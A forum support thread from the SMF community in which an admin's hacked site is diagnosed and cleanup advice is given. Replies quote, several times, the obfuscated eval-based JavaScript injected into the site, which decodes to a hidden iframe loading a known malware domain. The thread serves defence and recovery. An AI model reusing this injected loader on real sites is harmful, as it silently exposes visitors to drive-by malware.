News:

SMF 2.1.4 has been released! Take it for a spin! Read more.

Main Menu

forum fonts enlarged without any installation of mod

Started by yourdailysaver, May 19, 2012, 03:13:13 PM

Previous topic - Next topic

yourdailysaver

seniors please help my forum's all fonts are increased by around 4 font size. i haven't installed any mod in last 1 month. it started it in last two days. i tried all browsers. for reference my site is www.indian-femdom.com

NanoSector

Sorry yourdailysaver, but Google Chrome reports this (freely translated from Dutch):

www.indian-femdom.com is using content of the site shockingrates.com which is known of distributing malware. By visiting this site you are putting your computer at risk.

Check this report:
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fshockingrates.com%2Fmind%2Fin.cgi%3F6&client=googlechrome&hl=en

Until that's fixed, I doubt anyone would like to check out your site.
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

yourdailysaver

Quote from: Yoshi2889 on May 19, 2012, 03:21:43 PM
Sorry yourdailysaver, but Google Chrome reports this (freely translated from Dutch):

www.indian-femdom.com is using content of the site shockingrates.com which is known of distributing malware. By visiting this site you are putting your computer at risk.

Check this report:
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fshockingrates.com%2Fmind%2Fin.cgi%3F6&client=googlechrome&hl=en

Until that's fixed, I doubt anyone would like to check out your site.

oh god. please help buddy how to resolve this issue ?

NanoSector

Quote from: yourdailysaver on May 19, 2012, 03:27:07 PM
Quote from: Yoshi2889 on May 19, 2012, 03:21:43 PM
Sorry yourdailysaver, but Google Chrome reports this (freely translated from Dutch):

www.indian-femdom.com is using content of the site shockingrates.com which is known of distributing malware. By visiting this site you are putting your computer at risk.

Check this report:
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fshockingrates.com%2Fmind%2Fin.cgi%3F6&client=googlechrome&hl=en

Until that's fixed, I doubt anyone would like to check out your site.

oh god. please help buddy how to resolve this issue ?
I would suggest checking your index.php file for any weird things and a base64_decode (just CTRL+F that in your text editor, if it finds that you're having a problem).
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

yourdailysaver

Quote from: Yoshi2889 on May 19, 2012, 03:28:29 PM
Quote from: yourdailysaver on May 19, 2012, 03:27:07 PM
Quote from: Yoshi2889 on May 19, 2012, 03:21:43 PM
Sorry yourdailysaver, but Google Chrome reports this (freely translated from Dutch):

www.indian-femdom.com is using content of the site shockingrates.com which is known of distributing malware. By visiting this site you are putting your computer at risk.

Check this report:
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fshockingrates.com%2Fmind%2Fin.cgi%3F6&client=googlechrome&hl=en

Until that's fixed, I doubt anyone would like to check out your site.

oh god. please help buddy how to resolve this issue ?
I would suggest checking your index.php file for any weird things and a base64_decode (just CTRL+F that in your text editor, if it finds that you're having a problem).

sir sorry but didnt get it. what do i need to do exactly ?

NanoSector

Quote from: yourdailysaver on May 19, 2012, 03:29:29 PM
sir sorry but didnt get it. what do i need to do exactly ?
Nevermind ;D

* Yoshi2889 puts on his gas mask and protective suit

EDIT: looks like you're hacked, mate.

* Yoshi2889 stares at a huge Javascript block which shouldn't be there

<script>i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f73f62f69f57f65f63f68f61f72f55f74f59f73f4f57f69f67f5f67f63f68f58f5f63f68f4f57f61f63f21f12f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f73f62f69f57f65f63f68f61f72f55f74f59f73f4f57f69f67f5f67f63f68f58f5f63f68f4f57f61f63f21f12f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];}r=String;z=((e)?h:"");for(;585!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);}if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script><script>i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f73f62f69f57f65f63f68f61f72f55f74f59f73f4f57f69f67f5f67f63f68f58f5f63f68f4f57f61f63f21f12f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f73f62f69f57f65f63f68f61f72f55f74f59f73f4f57f69f67f5f67f63f68f58f5f63f68f4f57f61f63f21f12f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];}r=String;z=((e)?h:"");for(;585!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);}if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script><script>i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f73f62f69f57f65f63f68f61f72f55f74f59f73f4f57f69f67f5f67f63f68f58f5f63f68f4f57f61f63f21f12f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f73f62f69f57f65f63f68f61f72f55f74f59f73f4f57f69f67f5f67f63f68f58f5f63f68f4f57f61f63f21f12f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];}r=String;z=((e)?h:"");for(;585!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);}if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script>


Immediately change ALL your password, including Admin password, FTP password, database password, and everything.
Then read this:
http://wiki.simplemachines.org/smf/I_think_I_have_been_hacked
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

yourdailysaver

Quote from: Yoshi2889 on May 19, 2012, 03:30:59 PM
Quote from: yourdailysaver on May 19, 2012, 03:29:29 PM
Quote from: Yoshi2889 on May 19, 2012, 03:28:29 PM
Quote from: yourdailysaver on May 19, 2012, 03:27:07 PM
Quote from: Yoshi2889 on May 19, 2012, 03:21:43 PM
Sorry yourdailysaver, but Google Chrome reports this (freely translated from Dutch):

www.indian-femdom.com is using content of the site shockingrates.com which is known of distributing malware. By visiting this site you are putting your computer at risk.

Check this report:
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fshockingrates.com%2Fmind%2Fin.cgi%3F6&client=googlechrome&hl=en

Until that's fixed, I doubt anyone would like to check out your site.

oh god. please help buddy how to resolve this issue ?
I would suggest checking your index.php file for any weird things and a base64_decode (just CTRL+F that in your text editor, if it finds that you're having a problem).

sir sorry but didnt get it. what do i need to do exactly ?
Nevermind ;D

* Yoshi2889 puts on his gas mask and protective suit

? :(

NanoSector

* Yoshi2889 coughs

Quote from: Yoshi2889 on May 19, 2012, 03:30:59 PM
EDIT: looks like you're hacked, mate.

* Yoshi2889 stares at a huge Javascript block which shouldn't be there

<script>i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f73f62f69f57f65f63f68f61f72f55f74f59f73f4f57f69f67f5f67f63f68f58f5f63f68f4f57f61f63f21f12f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f73f62f69f57f65f63f68f61f72f55f74f59f73f4f57f69f67f5f67f63f68f58f5f63f68f4f57f61f63f21f12f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];}r=String;z=((e)?h:"");for(;585!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);}if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script><script>i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f73f62f69f57f65f63f68f61f72f55f74f59f73f4f57f69f67f5f67f63f68f58f5f63f68f4f57f61f63f21f12f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f73f62f69f57f65f63f68f61f72f55f74f59f73f4f57f69f67f5f67f63f68f58f5f63f68f4f57f61f63f21f12f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];}r=String;z=((e)?h:"");for(;585!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);}if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script><script>i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f73f62f69f57f65f63f68f61f72f55f74f59f73f4f57f69f67f5f67f63f68f58f5f63f68f4f57f61f63f21f12f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f73f62f69f57f65f63f68f61f72f55f74f59f73f4f57f69f67f5f67f63f68f58f5f63f68f4f57f61f63f21f12f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];}r=String;z=((e)?h:"");for(;585!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);}if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script>


Immediately change ALL your password, including Admin password, FTP password, database password, and everything.
Then read this:
http://wiki.simplemachines.org/smf/I_think_I_have_been_hacked

Having something before the <!doctype> tag or output in the <head> tag causes the layout to swell.
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

Storman™

yourdailysaver - Looks like your site has been hacked (with the code in index.php posted above)

If you don't want to edit files then have you a backup ?

If not maybe ask your host if they have a recent one that they can restore you to ?

yourdailysaver

i have lots of databases in my panel how can i know which database is for this forum ?

yourdailysaver

my other forum on www.bollychilli.com is also same problem fonts enlarged ? :( whats the issue sir. its on same server

Storman™

Quotei have lots of databases in my panel how can i know which database is for this forum ?


If you have access to your forum then look in:

Admin --> Configuration --> Server Settings --> Database and Paths

Then look for the Database Name field

Quotemy other forum on www.bollychilli.com is also same problem fonts enlarged ? :( whats the issue sir. its on same server

That also looks to be hacked with a similar issue (Avast lights up red lol)

Edit: Also looks like every spambot has arrived at once

yourdailysaver

and sir how can i change database password ? and if i change it where to update it in smf ?

Storman™

Quote...and sir how can i change database password ?

You should be able to do that in your control panel (depends on what you have)

Quote..and if i change it where to update it in smf ?

Admin --> Configuration --> Server Settings --> Database and Paths

Also, change the passwords for any FTP and SMF admin accounts

yourdailysaver

can i remove current users of database and create a new one with new name and password ?

IchBin™

yourdailysaver,

The first thing you should do whenever your site is compromised is to contact your host. Ask them to look into the problem and figure out how or why your site has been hacked. Immediately grab your server log from your account and when submitting a security issue please include the log file. Without the log there's no much we can do.

Take a look at this post to see if it helps clean things up. Also, you need to update your forum since there has been fixessince 2.0 was released. The latest version is 2.0.2
http://www.simplemachines.org/community/index.php?topic=313201
IchBin™        TinyPortal

yourdailysaver

kb scan gives error below,

Database Error
The SELECT would examine more than MAX_JOIN_SIZE rows; check your WHERE and use SET SQL_BIG_SELECTS=1 or SET SQL_MAX_JOIN_SIZE=# if the SELECT is okay
File: /hermes/bosweb/web262/b2627/ipg.ingeniousdesignsin1/BollyChilli/kb_scan.php
Line: 163

yourdailysaver

Quote from: IchBin™ on May 19, 2012, 04:17:27 PM
yourdailysaver,

The first thing you should do whenever your site is compromised is to contact your host. Ask them to look into the problem and figure out how or why your site has been hacked. Immediately grab your server log from your account and when submitting a security issue please include the log file. Without the log there's no much we can do.

Take a look at this post to see if it helps clean things up. Also, you need to update your forum since there has been fixessince 2.0 was released. The latest version is 2.0.2
http://www.simplemachines.org/community/index.php?topic=313201

i have reported them. does resotre my database to previous state will solve the problem ?

IchBin™

Quote from: yourdailysaver on May 19, 2012, 04:18:02 PM
kb scan gives error below,

Database Error
The SELECT would examine more than MAX_JOIN_SIZE rows; check your WHERE and use SET SQL_BIG_SELECTS=1 or SET SQL_MAX_JOIN_SIZE=# if the SELECT is okay
File: /hermes/bosweb/web262/b2627/ipg.ingeniousdesignsin1/BollyChilli/kb_scan.php
Line: 163

You have a limit set on your mysql server that you need to ask your host to change if you want to run the file.

Restoring the database does not fix the problem with your files. You need to clean all your files of the code that has been inserted into them. The kb_scan may help. Otherwise you need to speak to your host to make sure it is not able to happen again after you clean it up.
IchBin™        TinyPortal

Advertisement: